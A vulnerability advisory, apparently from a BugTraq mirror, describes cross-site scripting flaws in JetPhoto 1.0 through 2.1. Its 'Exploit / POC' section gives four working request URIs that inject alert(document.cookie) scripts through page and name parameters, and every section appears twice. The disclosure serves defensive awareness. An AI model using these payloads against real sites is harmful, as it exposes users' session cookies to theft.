JetPhoto Multiple Cross-Site Scripting Vulnerabilities
BID:17449
Info
JetPhoto Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 17449 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 11 2006 12:00AM |
| Updated: | Apr 11 2006 10:17PM |
| Credit: | 0o_zeus_o0 is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
jetphotosoft.com JetPhoto 2.1 jetphotosoft.com JetPhoto 2.0 jetphotosoft.com JetPhoto 1.0 |
| Not Vulnerable: | |
Discussion
JetPhoto Multiple Cross-Site Scripting Vulnerabilities
JetPhoto is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
JetPhoto is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Exploit / POC
JetPhoto Multiple Cross-Site Scripting Vulnerabilities
These issues can be exploited through a web client.
The following example URIs are available:
http://www.example.com/[path]/view/Classic.view/thumbnail.php?name=webalbum&page=<script>alert(document.cookie);</script>
http://www.example.com/[path]/view/Classic.view/gallery.php?name=JetPhoto_Album&page=<script>alert(document.cookie);</script>
http://www.example.com/[path]/view/Classic.view/detail.php?name=JetPhoto_Album&page=<script>alert(document.cookie);</script>
http://www.example.com/[path]/view/Orange.view/slideshow.php?name=<script></script><script>alert(document.cookie);</script>
These issues can be exploited through a web client.
The following example URIs are available:
http://www.example.com/[path]/view/Classic.view/thumbnail.php?name=webalbum&page=<script>alert(document.cookie);</script>
http://www.example.com/[path]/view/Classic.view/gallery.php?name=JetPhoto_Album&page=<script>alert(document.cookie);</script>
http://www.example.com/[path]/view/Classic.view/detail.php?name=JetPhoto_Album&page=<script>alert(document.cookie);</script>
http://www.example.com/[path]/view/Orange.view/slideshow.php?name=<script></script><script>alert(document.cookie);</script>
Solution / Fix
JetPhoto Multiple Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]